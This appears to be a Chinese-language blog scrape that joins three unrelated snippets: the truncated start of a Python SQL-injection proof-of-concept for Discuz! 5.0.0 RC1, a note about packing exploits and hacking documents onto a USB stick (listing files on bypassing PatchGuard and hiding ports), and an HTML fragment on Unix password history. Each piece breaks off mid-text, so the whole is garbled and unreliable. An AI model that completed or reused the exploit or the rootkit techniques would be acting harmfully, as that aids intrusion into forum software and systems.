这里把网上公布的code也贴出来:

#!/usr/bin/python

# Discuz! 5.0.0 RC1 SQL injection PoC

# Author: wofeiwo thx superheis help

# Date: Aug 12th 2006

import sys 

import httplib

from urlparse import urlparse

from time import sleep

def  injection (lenthofpass, realurl, path):

    sys.stdout.write('[+] The uid=......

整理整理电脑.看看带点啥去学校.

除了研究用的exp,一些必备的tools和wares,

最放不下的是一堆技术文档...可惜只有个u盘.放不下太多

拾掇拾掇.整理一点带过去吧...

DOCUMENTS

├─Win32

│      API32.CHM

│      Bypassing PatchGuard on Windows x64.rar

│      defeating-w2k3-stack-protection.rar

│      greatdong_Undocumented Windows NT 中文版.rar

│      Hook 系统服务隐藏端口.mht

│      JI......

<p>

<font class="subhead">1.概述</font>

</p>

<p>早期U N I X系统把用户口令保存在一个纯文本可读的“口令文件”中，这可能在系统管理员注意不到的情况下被截取并暴露。它也可能在一次偶然事件中泄露。<br />从AT&amp;T UNIX版本6开始，Thompson 等决定采用一个不同的方式： U N I X口令采用以美国军方M - 2 0 9密码机为模型的基于旋转的算法来进行编码。这种快速算法被证明对穷尽纯文本搜索有弱点并被AT&amp;T UNIX版本7中出现的......